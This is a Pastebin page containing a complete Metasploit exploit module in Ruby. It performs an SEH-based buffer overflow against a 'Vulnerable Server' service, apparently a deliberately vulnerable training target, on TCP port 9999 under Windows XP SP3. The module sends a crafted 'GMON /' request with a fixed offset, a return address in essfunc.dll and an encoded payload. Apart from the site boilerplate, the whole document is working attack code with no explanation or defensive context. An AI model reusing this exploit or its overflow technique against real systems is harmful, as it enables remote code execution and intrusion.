Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ## Metasploit To Max
- # http://metasploit.com/framework/
- ##
- require 'msf/core'
- class Metasploit3 < Msf::Exploit::Remote
- Rank = NormalRanking
- include Msf::Exploit::Remote::Tcp
- include Msf::Exploit::Seh
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Vulnerable Server SEH Exploit',
- 'Description' => %q{
- Vulnerable Server SEH Exploit
- },
- 'License' => MSF_LICENSE,
- 'Author' =>
- [
- 'Ninja-Security Team <admin[at]ninja-sec.org>',
- ' Anti-Trust', # MSF Module
- ],
- 'References' =>
- [
- [ 'OSVDB', '' ],
- [ 'CVE', '' ],
- [ 'URL', 'http://ninja-sec.org' ]
- ],
- 'DefaultOptions' =>
- {
- 'ExitFunction' => 'process', #none/process/thread/seh
- #'InitialAutoRunScript' => 'migrate -f',
- },
- 'Platform' => 'win',
- 'Payload' =>
- {
- 'BadChars' => "\x00\x0a\x0d",
- 'DisableNops' => true,
- },
- 'Targets' =>
- [
- [ 'WINDOWS XP SP3',
- {
- 'Ret' => 0x625011b3, # pop eax # pop eax # ret - essfunc.dll
- 'Offset' => 3498
- }
- ],
- ],
- 'Privileged' => false,
- 'DisclosureDate' => 'Sep 24 2012',
- 'DefaultTarget' => 0))
- register_options([Opt::RPORT(9999)], self.class)
- end
- def exploit
- connect
- buffer = rand_text(target['Offset'])
- buffer << generate_seh_record(target.ret)
- buffer << make_nops(30)
- buffer << payload.encoded
- print_status("Trying target #{target.name}...")
- sock.put('GMON /'+ buffer)
- handler
- disconnect
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement